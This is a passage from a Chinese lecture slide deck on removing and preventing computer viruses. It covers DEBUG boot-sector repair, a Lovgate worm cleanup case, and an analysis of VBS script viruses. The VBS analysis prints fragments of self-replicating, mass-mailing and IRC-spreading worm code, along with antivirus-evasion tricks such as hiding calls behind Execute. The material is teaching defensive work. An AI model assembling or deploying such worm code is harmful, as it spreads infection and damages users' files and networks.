第9章计算机病毒的清除和防御技术课件.ppt

第9章 计算机病毒的清除和预防技术,9.1 计算机病毒的清除技术9.2 计算机病毒的预防技术9.3 计算机病毒免疫9.4 硬盘数据的恢复9.5 常用反病毒策略和技术习题,计算机病毒的防治要从防毒、查毒和解毒3个方面来进行；同样，系统对于计算机病毒的实际防治能力和防治效果也要从防毒能力、查毒能力和解毒能力3方面来评判。防毒指的是根据系统特性，采取相应的系统安全措施预防病毒侵入计算机。查毒指的是对于确定的环境（包括内存、文件、引导区、网络等），能够准确地报出病毒名称。解毒指的是根据不同类型病毒对感染对象的修改，并按照病毒的感染特性所进行的恢复。该恢复过程不能破坏未被病毒修改的内容。感染对象包括内存、引导区、可执行文件、文档文件、网络等。,防毒能力是指预防病毒侵入计算机系统的能力。通过采取防毒措施，应可以准确、实时地监测预警经由光盘、软盘、硬盘、局域网、因特网（包括FTP方式、E-mail、HTTP等方式）或其他形式的文件下载等多种方式进行的传输；能够在病毒侵入系统时发出警报，记录携带病毒的文件，及时清除其中的病毒；对网络而言，能够向网络管理员发送关于病毒入侵的信息，记录病毒入侵的工作站，必要时还要能够注销工作站，隔离病毒源。,查毒能力是指发现和追踪病毒来源的能力。通过查毒应该能准确地发现计算机系统是否感染有病毒，准确查找出病毒的来源，并能给出统计报告。查解病毒的能力应由查毒率和误报率来评判。解毒能力是指从感染对象中清除病毒，恢复被病毒感染前的原始信息的能力。解毒能力用解毒率来评判。,清除计算机病毒要建立在正确检测病毒的基础之上。清除计算机病毒主要应做好以下工作： （1） 清除内存中的病毒。（2） 清除磁盘中的病毒。（3） 病毒发作后的善后处理。,9.1 计算机病毒的清除技术 9.1.1 计算机病毒的清除原理,大多数商品化的软件为保证对病毒的正确检测，都对内存进行检测。但清除内存中病毒的软件并不多，一般都要求从干净的系统盘启动后再做病毒的检测和清除工作。清除引导区病毒时，应预先准备好正常引导程序的备份，以对付覆盖型的引导区型病毒。对主引导区表信息应该特别注意，因为一旦分区表信息被破坏，要从硬盘中提取现有分区的状况并恢复分区表比较困难。对于将引导扇区转储的引导区型病毒，只要将原引导扇区找出并回写就可以了，但在回写前要检查其有效性，不然也可能会造成破坏， 使原本在带病毒的情况下尚能存取的硬盘，在清除了病毒之后反而找不到硬盘了。,除了覆盖型的文件型病毒之外，其他感染com型和exe型的文件型病毒都可以被清除干净。因为病毒是在基本保持原文件功能的基础上进行传染的，既然文件的基本功能在染毒后也能实现，只是增加了副产品依靠文件中增加的病毒代码运行的病毒，那么反病毒软件也可以仿照病毒的方法进行传染的逆过程将增加的病毒代码清除出被感染文件，并保持其原有的功能。但是，被覆盖型病毒感染的文件最好彻底删除，因为文件原有的部分代码已被病毒代码所取代且没有备份，从而无法恢复文件原有的功能。,计算机病毒的清除方法一般有人工清除法和自动清除法两种。人工清除是指用户利用软件，如DEBUG 、PCTOOLS等所具有的有关功能进行病毒清除；自动清除是指利用防治病毒的软件来清除病毒。,9.1.2 计算机病毒的清除方法,这两种方法视具体情况灵活运用。虽然目前有不少防治病毒的软件，但由于病毒的多样性和软件的使用范围的局限性，不可能刚出现一种病毒就能很快研制出一种清除和抗毒的软件。因此，掌握人工清除有特别重要的意义。人工清除的步骤是： 首先，用一张“干净”（无病毒感染）的DOS系统盘，关闭写保护，启动系统；然后判断病毒感染对象。如果是分区感染，则恢复正常的分区表；如果是Boot区感染，则恢复Boot 区；如果是可执行文件感染，则对该文件消毒；最后，回收资源，如修改文件分配表（FAT）、根目录区等。,1. 文件型病毒的清除方法在计算机病毒中绝大部分是文件型病毒。所谓“文件型病毒”是指此类病毒寄生在可执行文件上，传播的途径也是依靠可执行文件。从数学角度来讲，清除病毒的过程实际上是病毒感染过程的逆过程。通过检测工作，已经得到了病毒体的全部代码，用于还原的数据肯定在病毒体内，只要找到这些数据，依照一定的方法即可将文件恢复，也就是说可以将病毒清除。,清除文件型病毒通常按照以下步骤进行: 分析病毒与被感染文件之间的链接方式。 确定病毒程序是位于文件的首部还是尾部，找到病毒程序开始和结束的位置，还原被感染文件的主要部分。 恢复被感染文件的头部参数。感染com文件的病毒会把com文件的头3B替换为病毒程序，并且把这3B保存在病毒体中。恢复时，就要从病毒体中找出这3B，用来替换文件头中的病毒程序。,exe文件被病毒感染后，文件头中的CS、IP、SS、SP等字段会被病毒修改，与被感染的com文件一样，这些字段的原有值被存放在病毒体中。特别要注意的是，有些病毒会先把这些值加密或变形，然后再存储。找出这些参数后，恢复文件头中的CS、IP、SS、SP等字段的值。另外，清除文件中的病毒后，文件的长度会变短，因此需要修改文件头中的长度参数。最后，把恢复后的内容写入文件。在这一过程中，因为不包括病毒体，文件长度会变短，只要把文件的正常内容写入文件，病毒体就会被清除。,2. 引导型病毒的清除方法（1） 引导型病毒的清除原理 引导型病毒感染时的攻击部位有硬盘主引导扇区和硬盘或软盘的Boot扇区。为保存原主引导扇区、Boot扇区，病毒可能随意地将它们写入其他扇区，而毁坏这些扇区。 硬盘主引导扇区染毒是可以修复的。恢复步骤如下： 用无毒软盘启动系统。,寻找一台同类型、硬盘分区相同的无毒机器，将其硬盘主引导扇区写入一张软盘；或者病毒感染前硬盘主引导扇区有备份，将备份的主引导扇区写入一张软盘。将此软盘插入染毒机器，将其中采集的主引导扇区数据写入染毒硬盘，即可修复。 硬盘、软盘Boot扇区染毒也可以修复。解决办法就是寻找与染毒盘相同版本的无毒系统软盘，执行SYS命令，即可修复。 引导型病毒如果将原主引导扇区或Boot扇区以覆盖的方式写入根目录区，被覆盖的根目录区将被完全损坏，不可能修复。, 如果引导型病毒将原主引导扇区或Boot扇区以覆盖的方式写入第一FAT时，第二FAT未破坏，则可以修复。可将第二FAT复制到第一FAT中。 一般，引导型病毒占用的其他部分存储空间，只有采用“坏簇”技术和“文件结束簇”技术占用的空间需要收回。,(2) DEBUG清除引导型病毒在检测到磁盘被引导型病毒感染后，清除病毒的基本思想是用正常的系统引导程序覆盖引导扇区中的病毒程序。如果在病毒感染以前，预先阅读并保存了磁盘主引导区和DOS引导扇区的内容，就很容易清除病毒。可以用DEBUG把保存的内容读入内存，再写入到引导扇区，于是引导扇区中的病毒被正常引导程序所替代。假设MBR.dat和Boot.dat分别保存的是硬盘的主导扇区和DOS引导扇区的内容，长度为512B，则按以下步骤执行：,A DEBUGN MBR.DATL 7C00N Boot.DATL 7E00A 100XXXX ： 0100 MOV AX ， 0301XXXX ： 0103 MOV BX ， 7C00XXXX ： 0106 MOV CX ， 0001XXXX ： 0109 MOV DX ， 0080XXXX ： 010C INT 13XXXX ： 010E INT 3,XXXX ： 010F G W 7E00 2 0 1 Q如果没有保留引导扇区的信息，则清除其中的病毒比较困难。对于那些把引导扇区的内容转移到其他扇区中的病毒，需要分析病毒程序的引导代码，找出正常引导扇区内容的存放地址，把它们读入内存，再按上面的方法写到引导扇区中。这将要花费较多的时间。,而对于那些直接覆盖引导扇区的病毒，则必须从其他微机中读取正常的引导程序。具体做法是： 先从没有被病毒感染的微机硬盘中读取主引导扇区内容，其中含有主引导程序和该硬盘的分区表。将其写入被病毒感染的硬盘主引导区，然后把写入的主引导程序和本硬盘的分区表连接，把连接后的内容写入内存。假设从未被感染的微机硬盘中读取主引导扇区，存放在A盘的MBR.dat中：,A DEBUG A 100XXXX ： 0100 MOV AX ， 0201XXXX ： 0103 MOV BX ， 7C00XXXX ： 0106 MOV CX ， 0001XXXX ： 0109 MOV DX ， 0080XXXX ： 010C INT 13XXXX ： 010E INT 3XXXX ： 010F G N A ： MBR R CX,0200 W 7C00 Q 这样已经得到了一张带有正常主引导扇区的软盘，下面要做的就是把这些内容写入被病毒感染的硬盘。在带有病毒的计算机上，用“干净”的系统盘启动，然后进入DEBUG：,A DEBUG A 100XXXX ： 0100 MOV AX ， 0201XXXX ： 0103 MOV BX ， 7C00XXXX ： 0106 MOV CX ， 0001XXXX ： 0109 MOV DX ， 0080XXXX ： 010C INT 13XXXX ： 010E INT 3XXXX ： 010F G N A ： MBR L 7E00 0200 M 7E00 L IBE 7C00, A 100XXXX ： 0100 MOV AX ， 0301XXXX ： 0103 G = 100 Q以上介绍的是清除硬盘主引导扇区病毒的方法。对于硬盘DOS引导扇区中的病毒，可以用和硬盘上相同版本的DOS（从软盘）启动，再执行A:SYS C： 命令传送系统到C盘，即可清除硬盘DOS引导扇区的病毒。,3. 宏病毒的清除方法宏病毒是一类主要感染Word文档和文档模板等数据文件的病毒。宏病毒是使用某个应用程序自带的宏编程语言编写的病毒，目前国际上已发现3类宏病毒： 感染Word系统的Word宏病毒、感染Excel系统的Excel宏病毒和感染Lotus Ami Pro的宏病毒。目前，人们所说的宏病毒主要指Word和Excel宏病毒。,与以往的病毒不同，宏病毒有以下特点。（1） 感染数据文件： 宏病毒专门感染数据文件，彻底改变了人们的“数据文件不会传播病毒”的错误认识。（2） 多平台交叉感染： 宏病毒冲破了以往病毒在单一平台上传播的局限，当Word、Excel这类软件在不同平台(如Windows、Windows NT/2000、OS/2和Macintosh等)上运行时，会被宏病毒交叉感染。（3） 容易编写： 以往病毒是以二进制的计算机机器码形式出现，而宏病毒则是以人们容易阅读的源代码形式出现，所以编写和修改宏病毒比以往病毒更容易。,（4） 容易传播： 别人送一篇文章或发一封电子邮件给你，如果它们带有病毒，只要打开这些文件，计算机就会被宏病毒感染了。此后，打开或新建文件都可能带上宏病毒，这导致了宏病毒的感染率非常高。感染了宏病毒后，同样可以用防治计算机病毒的软件来查杀，如果手头一时没有病毒防治软件的话，对某些感染Word文档的宏病毒也可以通过手工操作的方法来查杀的。,4. 网络病毒清除方法网络病毒主要指通过网络进行传染的病毒，网络指的是传染渠道，就病毒本身而言，可能包括文件型病毒、引导型病毒等多种病毒，所以这里所说的清除方法是针对网络，主要是局域网这一特殊传染环境的各种针对性措施： （1） 立即使用BROADCAST等命令，通知所有用户退网，关闭文件服务器。（2） 用带有写保护的、“干净”的系统盘启动系统管理员工作站，并立即清除本机病毒。,（3） 用带有写保护的“干净”的系统盘启动文件服务器，系统管理员登录后，使用DISABLE LOGIN等命令禁止其他用户登录。（4） 将文件服务器的硬盘中的重要资料备份到干净的软盘上。但千万不可执行硬盘上的程序，也千万不要往硬盘中复制文件，以免破坏被病毒搞乱的硬盘数据结构。（5） 用病毒防治软件扫描服务器上所有卷的文件，恢复或删除被病毒感染的文件，重新安装被删文件。（6） 用病毒防治软件扫描并清除所有可能染上病毒的软盘或备份文件中的病毒。,（7） 用病毒防治软件扫描并清除所有的有盘工作站硬盘上的病毒。（8） 在确信病毒已经彻底清除后，重新启动网络和工作站。如有异常现象，请网络安全与病毒防治专家来处理。,计算机世界网消息： 2003年2月25日，瑞星全球反病毒监测网在国内率先截获“爱情后门（Worm.Lovgate）”病毒及4个变种（Worm.Lovgate.a/b/c/d/e）。续而出现该病毒的其他变种，Worm.LovGate.h、Worm.LovGate.sub、Worm.LovGate.j.enc、Worm.LovGate.k等。该病毒集蠕虫、后门、黑客3种攻击手段于一身，通过病毒邮件进行传播，一旦感染计算机后，就会建立一个“后门”，并与外界的操纵者取得联系，使得被感染机器处于外界的远程控制之中。,9.1.3 病毒清除实例一：Lovgate病毒,外界操纵者可以轻易地向本机传送盗窃程序，获得该计算机的口令等资料。对于局域网用户来说，病毒通过一台被感染的计算机迅速传播到整个局域网，最终导致所有计算机用户被外界操纵者控制、网络瘫痪、信息泄露等严重后果。如果外界操纵者带有商业或政治等目的，那么使用这个病毒，将使政府机关和各商业机构的信息系统完全被控制、机密泄露。,1. 感染Lovgate病毒的征兆（1） Outlook经常询问是否要往指定的地址发送邮件。（2） 部分文件夹中多了许多奇怪的文件，如100 free essays school.pif、Age of empires 2 crack.exe、AN-YOU-SUCK-IT.txt.pif、Are you looking for Love.doc.exe、autoexec.bat、CloneCD + crack.exe、How To Hack Websites.exe、Mafia Trainer!.exe、MoviezChannelsInstaler.exe、MSN Password Hacker and Stealer.exe、Panda Titanium Crack.zip.exe、Sex_For_You_Life.JPG.pif、,SIMS FullDownloader.zip.exe、Star Wars II Movie Full Downloader.exe、The world of lovers.txt.exe、Winrar + crack.exe等。（3） WINNTtemp文件夹甚至系统盘被共享。（4） 下拉菜单无法使用。（5） 计算机上安装的软件图标被改变，并且不可执行。感染不同Lovgate的变体，可能只会出现以上情况中的一部分。,2. Lovgate病毒的感染途径（1） 通过局域网进行传播当通过共享文件夹进行传播时，病毒在局域网内找到具有读写权限的共享文件夹，并将自身复制到该文件夹中，生成以下命名的病毒文件，如100 free essays school.pif、Age of empires 2 crack.exe、AN-YOU-SUCK-IT.txt.pif等，其大小为105KB，属性为隐藏。,（2） 通过邮件进行传播在通过电子邮件进行传播时，病毒会自动回复Outlook或Outlook Express中新收到的所有电子邮件。病毒还会在被感染的计算机内搜索电子邮件地址，并把病毒以附件的形式发送给这些地址。邮件的主题、内容和附件都不是固定的，而是从病毒代码中随机选取的。,3. Lovgate病毒的危害（1） 生成病毒文件病毒运行后会在系统目录下生成病毒文件IEXPLORE.exe、RAVMOND.exe、WinDriver.exe、WINGATE.exe、WINHELP.exe、WINRPC.exe，其大小为105KB，属性为隐藏。并生成ILY668.dll、KERNEL66.dll、REG678.dll、TASK688.dll，其大小为80KB，属性为隐藏。在WINNTtemp 下生成随机文件名+特殊后缀的文件。而特殊后缀多由mp3.exe、avi.exe、txt.exe、gif.exe、dat.exe、jpg.exe等构成。,（2） 修改注册表在HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun下创建：WinHelp=C:WINNTSystem32WinHelp.exeWinGate initialize=C:WINNTSystem32WinGate.exe remoteshellProgram In Windows=C:WINNTSystem32IEXPLORE.exeRemote Procedure Call Locator=RUNDLL32.exe reg678.dll ondll_reg,在HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWindows下创建Run=RAVMOND.exe。病毒修改注册表中.txt文件的关联，使得打开.txt文件时运行病毒程序： HKEY_CLASSES_ROOTtxtfileshellopencommandDefault=winrpc.exe %1,（3） 口令试探攻击，盗用口令病毒会利用ipc$命名管道进行guest和Administrator账号的简单口令试探，如果成功将自己复制到对方的sytem32目录中，命名为stg.exe，并注册成Window Remote Service服务,同时释放出一个名为win32vxd.dll的盗口令文件，以盗取用户口令。（4） 建立和释放后门，威胁计算机安全 病毒会建立一个后门，等待外界用户连入，然后从病毒体内放出一个dll后门程序负责建立远程shell后门。,（5） 在局域网中疯狂地传播病毒不停地搜索网络资源，导致整个局域网资源被占用，如果发现有共享目录，则将自身复制过去。（6） 搜索邮件目录，不断发送病毒邮件病毒会启动一个线程，通过注册表SoftwareMicrosoftWindowsCurrentVersion ExplorerShell Folders的表项得到系统目录，然后搜索*.ht*中的email地址，找到后，病毒就利用MAPI功能，向外不断发送病毒邮件。,4. Lovgate病毒的清除（1） 手工清除Lovgate病毒的步骤步骤一： 终止病毒进程在Windows 98/Me系统中，按下Ctrl+Alt+Del组合键;在Windows NT/2000/XP系统中，按下Ctrl+Shift+Esc，选择“任务管理器进程”，选中正在运行的进程病毒程序，并终止其运行，然后关闭任务管理器。,步骤二： 恢复注册表单击“开始运行”，输入Regedit，运行注册表编辑器。 删除病毒在HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun下创建的注册表键值。 恢复病毒在HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows CurrentVersionRun下创建的注册表键值。, 将病毒在HKEY_CLASSES_ROOTtxtfileshellopencommand下进行的修改“winrpc.exe %1”更改为“NOTEPAD.exe %1”。修改完毕后关闭注册表编辑器。步骤三： 完成上述工作后重新启动计算机，对系统进行全面的病毒检测和清除。,（2） 使用病毒防治软件现在有多种病毒防治软件可以查杀Lovgate病毒。例如，到瑞星网站上下载瑞星Lovgate专用病毒防治软件最新版，断开网络后反复查杀。建议综合使用这两种方法，先手工清除Lovgate, 然后再用Lovgate专用病毒防治软件反复查杀。,5. Lovgate病毒的防范措施（1） 选择病毒防治软件首先必须选择一个好的病毒防治软件。有了好的病毒防治软件，必须保证它在后台进行。（2） 使用病毒防火墙安装了新版本的病毒防治软件后，必须保证病毒防火墙在后台运行，这样一旦发现病毒，病毒防火墙将会自动报警并提示杀毒。（3） 维护病毒防治软件有了病毒防治软件，还必须及时更新维护，如果是正版软件，每出现一个新版本，都会提示自动升级。现在大多数病毒防治软件均支持在线升级或者下载升级软件包。,（4） 定时、有效查杀病毒统一安排时间，定时对计算机进行全面的检查。在杀毒时，必须在将计算机从局域网断开的情况下进行，同时使用管理员用户权限登录，以避免因为权限不够，而导致不能对系统文件或其他具有特殊权限的文件进行有效检查。（5） 共享文件夹的设置和使用共享是网络的特点，但是必须有安全机制做保障。由于病毒会扫描网络中有读写权限的共享文件夹进行传染，所以用户在设置共享文件时，建议设置为只读共享，读写共享必须设置口令，并尽可能地缩短读写共享的存在时间。,2000年5月4日欧美爆发的“爱虫”网络蠕虫病毒。由于通过电子邮件系统传播，爱虫病毒在短短几天内狂袭全球数百万计的计算机。微软、Intel等在内的众多大型企业网络系统瘫痪，全球经济损失达几十亿美元。而2001年爆发的新欢乐时光病毒至今都让广大计算机用户苦不堪言。上面提及的两个病毒最大的一个共同特点是使用VBScript编写。以爱虫和新欢乐时光病毒为典型代表的VBS脚本病毒十分猖獗，很重要的一个原因就是其编写简单。,9.1.4 病毒清除实例二：VBS脚本病毒,1. VBS脚本病毒的特点VBS病毒是用VB Script编写的，该脚本语言功能非常强大，它们利用Windows系统的开放性特点，通过调用一些现成的Windows对象、组件，可以直接对文件系统、注册表等进行控制，功能非常强大。VBS脚本病毒具有如下几个特点： （1） 编写简单一个以前对病毒一无所知的病毒爱好者可以在很短的时间里编出一个新型病毒来。,（2） 破坏力大其破坏力不仅表现在对用户系统文件及性能的破坏，还可以使邮件服务器崩溃，网络严重阻塞。（3） 感染力强由于脚本是直接解释执行，并且它不像PE病毒那样，需要做复杂的PE文件格式处理，因此这类病毒可以直接通过自我复制的方式感染其他同类文件，并且自我的异常处理变得非常容易。,（4） 传播范围大这类病毒通过htm文档、E-mail附件或其他方式，可以在很短时间内传遍世界各地。 （5） 病毒源码容易被获取、变种多由于VBS病毒解释执行，其源代码可读性非常强，即使病毒源码经过加密处理后，其源代码的获取还是比较简单。因此，这类病毒变种比较多，稍微改变一下病毒的结构，或者修改一下特征值，很多病毒防治软件可能就无能为力。,（6） 欺骗性强脚本病毒为了得到运行机会，往往会采用各种让用户不大注意的手段，例如，邮件的附件名采用双后缀，如.jpg.vbs，由于系统默认不显示后缀，这样，当用户看到这个文件的时候，就会认为它是一个jpg图片文件。 （7） 病毒生产机实现起来非常容易所谓“病毒生产机”，就是可以按照用户的意愿生产病毒的机器（当然，这里指的是程序），目前的病毒生产机大多数都为脚本病毒生产机，最重要的原因还是因为脚本是解释执行的，实现起来非常容易。,2. VBS脚本病毒原理分析 （1） VBS脚本病毒的感染方式VBS脚本病毒一般是直接通过自我复制来感染文件的，病毒中的绝大部分代码都可以直接附加在其他同类程序的中间。例如，新欢乐时光病毒可以将自己的代码附加在htm文件的尾部，并在顶部加入一条调用病毒代码的语句，而爱虫病毒则是直接生成一个文件的副本，将病毒代码复制到其中，并以原文件名作为病毒文件名的前缀，vbs作为后缀。下面通过爱虫病毒的部分代码具体分析这类病毒的感染和搜索原理。,以下是文件感染的部分关键代码： Set fso=createobject(scripting.filesystemobject) 创建一个文件系统对象set self=fso.opentextfile(wscript.scriptfullname,1) 读打开当前文件（即病毒本身）vbscopy=self.readall 读取病毒全部代码到字符串变量vbscopy set ap=fso.opentextfile(目标文件.path,2,true) 写打开目标文件，准备写入病毒代码ap.write vbscopy 将病毒代码覆盖目标文件ap.closeset cop=fso.getfile(目标文件.path) 得到目标文件路径,cop.copy(目标文件.path & .vbs) 创建另外一个病毒文件（以.vbs为后缀）目标文件.delete(true) 删除目标文件上面描述了病毒文件是如何感染正常文件的。首先将病毒自身代码赋给字符串变量vbscopy，然后将这个字符串覆盖写到目标文件，并创建一个以目标文件名为文件名前缀、vbs为后缀的文件副本，最后删除目标文件。 下面具体分析文件搜索代码：,该函数主要用来寻找满足条件的文件，并生成对应文件的一个病毒副本sub scan(folder_) scan函数定义，on error resume next 如果出现错误，直接跳过，防止弹出错误窗口set folder_=fso.getfolder(folder_)set files=folder_.files 当前目录的所有文件集合for each file in filesext=fso.GetExtensionName(file)获取文件后缀ext=lcase(ext) 后缀名转换成小写字母if ext=mp5 then 如果后缀名是mp5，则进行感染。,请自己建立相应后缀名的文件，最好是非正常后缀名，以免破坏正常程序！Wscript.echo (file)end ifnextset subfolders=folder_.subfoldersfor each subfolder in subfolders搜索其他目录；递归调用scan( ) scan(subfolder)next end sub,(2) VBS脚本病毒的网络传播方式及代码分析 通过E-mail附件传播 这是一种用得非常普遍的传播方式。病毒可以通过各种方法得到合法的E-mail地址，最常见的就是直接取Outlook地址簿中的邮件地址，也可以通过程序在用户文档（例如htm文件）中搜索E-mail地址。下面具体分析VBS脚本病毒是如何做到这一点的。,Function mailBroadcast()on error resume nextwscript.echoSet outlookApp = CreateObject(Outlook.Application) /创建一个Outlook应用的对象If outlookApp= Outlook ThenSet mapiObj=outlookApp.GetNameSpace(MAPI) /获取MAPI的名字空间Set addrList= mapiObj.AddressLists /获取地址表的个数 For Each addr In addrListIf addr.AddressEntries.Count 0 Then,addrEntCount = addr.AddressEntries.Count /获取每个地址表的E-mail记录数For addrEntIndex= 1 To addrEntCount /遍历地址表的E-mail地址Set item = outlookApp.CreateItem(0) /获取一个邮件对象实例Set addrEnt = addr.AddressEntries(addrEntIndex) /获取具体E-mail地址item.To = addrEnt.Address /填入收信人地址 item.Subject = 病毒传播实验 /写入邮件标题item.Body = 这里是病毒邮件传播测试，收到此信请不要慌张！,/写入文件内容Set attachMents=item.Attachments /定义邮件附件attachMents.Add fileSysObj.GetSpecialFolder(0)&test.jpg.vbsitem.DeleteAfterSubmit = True /信件提交后自动删除If item.To Then item.Send /发送邮件shellObj.regwrite HKCUsoftwareMailtestmailed, 1 /病毒标记，以免重复感染End IfNext,End IfNextEnd ifEnd Function 通过局域网共享传播 局域网共享传播也是一种非常普遍并且有效的网络传播方式。一般来说，为了局域网内交流方便，一定存在不少共享目录，并且具有可写权限。例如，在Windows 2000创建共享时，默认就是具有可写权限。这样病毒通过搜索这些共享目录，就可以将病毒代码传播到这些目录之中。,在VBS中，有一个对象可以实现网上邻居共享文件夹的搜索与文件操作。利用该对象就可以达到传播的目的。welcome_msg = 网络连接搜索测试Set WSHNetwork = WScript.CreateObject(WScript.Network)创建一个网络对象Set oPrinters = WshNetwork.EnumPrinterConnections 创建一个网络打印机连接列表WScript.Echo Network printer mappings:For i = 0 to oPrinters.Count -1Step2 显示网络打印机连接情况WScript.Echo Port &oPrinters.Item(i),& = & oPrinters.Item(i+1)Next Set colDrives = WSHNetwork.EnumNetworkDrives 创建一个网络共享连接列表If colDrives.Count = 0 ThenMsgBox 没有可列出的驱动器。,vbInformation + vbOkOnly,welcome_msg ElsestrMsg = 当前网络驱动器连接: &CRLFFori=0To colDrives.Count -1 Step 2 strMsg = strMsg & Chr(13)&Chr(10)&colDrives(i) & Chr(9)&colDrives(i+1)NextMsgBox strMsg, vbInformation + vbOkOnly,welcome_msg显示当前网络驱动器连接End If, 通过感染htm、asp、jsp、php等网页文件传播 如今，WWW服务已经变得非常普遍，病毒通过感染htm等文件，势必会导致所有访问过该网页的用户机器感染病毒。 病毒之所以能够在htm文件中发挥强大功能，采用了和绝大部分网页恶意代码相同的原理,不过，也可以采用其他代码。以下这段代码是病毒FSO、WSH等对象能够在网页中运行的关键。,在注册表HKEY_CLASSES_ROOTCLSID下可以找到一个主键F935DC22-1CF0-11D0-ADB9-00C04FD58A0B，注册表中对它的说明是“Windows Script Host Shell Object”，同样也可以找到0D43FE01-F093-11CF-8940-00A0C9054228，注册表对它的说明是“FileSystem Object”，一般先要对COM进行初始化，在获取相应的组件对象之后，病毒便可正确地使用FSO、WSH两个对象，调用它们的强大功能。代码如下所示：,Set Apple0bject = document.applets(KJ_guest)Apple0bject.setCLSID(F935DC22-1CF0-11D0-ADB9-00C04FD58A0B)Apple0bject.createInstance() 创建一个实例Set WsShell Apple0bject.Get0bject()Apple0bject.setCLSID(0D43FE01-F093-11CF-8940-00A0C9054228)Apple0bject.createInstance() 创建一个实例Set FSO = Apple0bject.Get0bject(), 通过IRC聊天通道传播 病毒通过IRC传播一般来说采用以下代码（以MIRC为例） :Dim mirc set fso=CreateObject(Scripting.FileSystemObject)set mirc=fso.CreateTextFile(C:mircscript.ini) 创建文件script.inifso.CopyFile Wscript.ScriptFullName, C:mircattachment.vbs,True 将病毒文件备份到attachment.vbsmirc.WriteLine scriptmirc.WriteLine n0=on 1:join:*.*: if($nick !=$me)halt /dcc send $nick,C:mircattachment.vbs 利用命令/ddc send $nick attachment.vbs给通道中的其他用户传送病毒文件mirc.Close另外,病毒也可以通过现在广泛流行的KaZaA进行传播。病毒将病毒文件复制到KaZaA的默认共享目录中，这样，当其他用户访问这台机器时，就有可能下载该病毒文件并执行。这种传播方法可能会随着KaZaA这种点对点共享工具的流行而发生作用。,3. VBS脚本病毒如何获得控制权（1） 修改注册表项 Windows在启动的时候，会自动加载HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun项下的各键值所执向的程序。脚本病毒可以在此项下加入一个键值指向病毒程序，这样就可以保证每次机器启动的时候拿到控制权。VBS修改注册表的方法比较简单，直接调用下面语句即可： wsh.RegWrite(strName, anyvalue ,strType),（2） 通过映射文件执行方式 例如，新欢乐时光将dll的执行方式修改为wscript.exe。甚至可以将exe文件的映射指向病毒代码。（3） 欺骗用户，让用户自己执行 这种方式其实和用户的心理有关。譬如，病毒在发送附件时，采用双后缀的文件名，由于默认情况下，后缀并不显示。,（4） desktop.ini和folder.htt互相配合 这两个文件可以用来配置活动桌面，也可以用来自定义文件夹。如果用户的目录中含有这两个文件，当用户进入该目录时，就会触发folder.htt中的病毒代码。这是新欢乐时光病毒采用的一种比较有效的获取控制权的方法。并且利用folder.htt，还可能触发exe文件，这也可能成为病毒得到控制权的一种有效方法。,4. VBS脚本病毒对抗反病毒软件的技巧 （1） 自加密 例如，新欢乐时光病毒，它可以随机选取密钥对自己的部分代码进行加密变换，使得每次感染的病毒代码都不一样，达到了多态的效果。这给传统的特征值查毒法带来了一些困难。病毒也还可以进一步的采用变形技术，使得每次感染后的加密病毒的解密后的代码都不一样。,（2） 巧妙运用Execute函数 用过VBS程序的用户是否会觉得奇怪： 当一个正常程序中用到了FileSystemObject对象的时候，有些反病毒软件会在对这个程序进行扫描的时候报告说此文件的VBS风险为高，但是有些VBS脚本病毒同样采用了FileSystemObject对象，为什么却又没有任何警告呢？原因很简单，就是因为这些病毒巧妙地运用了Execute方法。有些病毒防治软件检测VBS病毒时，会检查程序中是否声明使用了FileSystemObject对象，如果采用了，这会发出报警。如果病毒将这段声明代码转化为字符串，然后通过Execute（String）函数执行，就可以躲避某些反病毒软件。,（3） 改变某些对象的声明方法 譬如fso=createobje